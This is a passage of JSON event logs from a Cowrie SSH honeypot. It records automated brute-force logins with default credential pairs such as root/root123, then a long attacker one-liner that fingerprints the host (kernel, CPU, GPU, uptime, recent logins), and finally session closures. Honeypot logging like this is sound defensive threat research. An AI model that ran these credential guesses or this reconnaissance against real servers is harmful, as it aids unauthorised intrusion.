a2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:34:32.868646Z","src_ip":"170.64.157.139","session":"fa4116938da1"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-09-08T17:34:33.963637Z","src_ip":"170.64.157.139","session":"fa4116938da1"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:34:35.298463Z","src_ip":"170.64.157.139","session":"fa4116938da1"}
{"eventid":"cowrie.session.connect","src_ip":"121.46.231.41","src_port":47316,"dst_ip":"1.2.3.4","dst_port":22,"session":"11191ee0e4df","protocol":"ssh","message":"New connection: 121.46.231.41:47316 (1.2.3.4:22) [session: 11191ee0e4df]","sensor":"my-vps","timestamp":"2025-09-08T17:35:51.035591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.11","message":"Remote SSH version: SSH-2.0-libssh-0.11","sensor":"my-vps","timestamp":"2025-09-08T17:35:51.243167Z","src_ip":"121.46.231.41","session":"11191ee0e4df"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:35:51.440953Z","src_ip":"121.46.231.41","session":"11191ee0e4df"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":60842,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6743ba562e3","protocol":"ssh","message":"New connection: 170.64.157.139:60842 (1.2.3.4:22) [session: c6743ba562e3]","sensor":"my-vps","timestamp":"2025-09-08T17:36:07.799167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:36:07.800230Z","src_ip":"170.64.157.139","session":"c6743ba562e3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:36:08.051827Z","src_ip":"170.64.157.139","session":"c6743ba562e3"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-09-08T17:36:09.124197Z","src_ip":"170.64.157.139","session":"c6743ba562e3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:36:10.385049Z","src_ip":"170.64.157.139","session":"c6743ba562e3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59618,"dst_ip":"1.2.3.4","dst_port":22,"session":"281f955b5420","protocol":"ssh","message":"New connection: 217.72.205.35:59618 (1.2.3.4:22) [session: 281f955b5420]","sensor":"my-vps","timestamp":"2025-09-08T17:36:23.335111Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:36:23.336174Z","src_ip":"217.72.205.35","session":"281f955b5420"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":36980,"dst_ip":"1.2.3.4","dst_port":22,"session":"35e296c79971","protocol":"ssh","message":"New connection: 170.64.157.139:36980 (1.2.3.4:22) [session: 35e296c79971]","sensor":"my-vps","timestamp":"2025-09-08T17:37:41.467097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:37:41.468039Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:37:41.763207Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:37:42.676002Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:37:43.292825Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.293740Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.294643Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.295594Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.296743Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.297535Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.298358Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.299372Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.300117Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.300832Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.301453Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.302092Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.302595Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.599474Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.600447Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:37:43.601587Z","src_ip":"170.64.157.139","session":"35e296c79971"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":34782,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbeb4da689f5","protocol":"ssh","message":"New connection: 170.64.157.139:34782 (1.2.3.4:22) [session: dbeb4da689f5]","sensor":"my-vps","timestamp":"2025-09-08T17:39:06.249171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:39:06.250492Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:39:06.630921Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.login.success","username":"root","password":"root321","message":"login attempt [root/root321] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:39:07.685200Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:39:08.414477Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.415225Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.415969Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.416902Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.418022Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.418822Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.419570Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.420612Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.421131Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.421753Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.422400Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.423005Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.423497Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.855265Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.856194Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:39:08.857256Z","src_ip":"170.64.157.139","session":"dbeb4da689f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43844,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e28695e38e","protocol":"ssh","message":"New connection: 212.227.235.229:43844 (1.2.3.4:22) [session: 84e28695e38e]","sensor":"my-vps","timestamp":"2025-09-08T17:39:43.201069Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:39:43.202156Z","src_ip":"212.227.235.229","session":"84e28695e38e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44183,"dst_ip":"1.2.3.4","dst_port":22,"session":"f65ee0bdf461","protocol":"ssh","message":"New connection: 212.227.235.229:44183 (1.2.3.4:22) [session: f65ee0bdf461]","sensor":"my-vps","timestamp":"2025-09-08T17:39:43.341501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:39:43.343246Z","src_ip":"212.227.235.229","session":"f65ee0bdf461"}
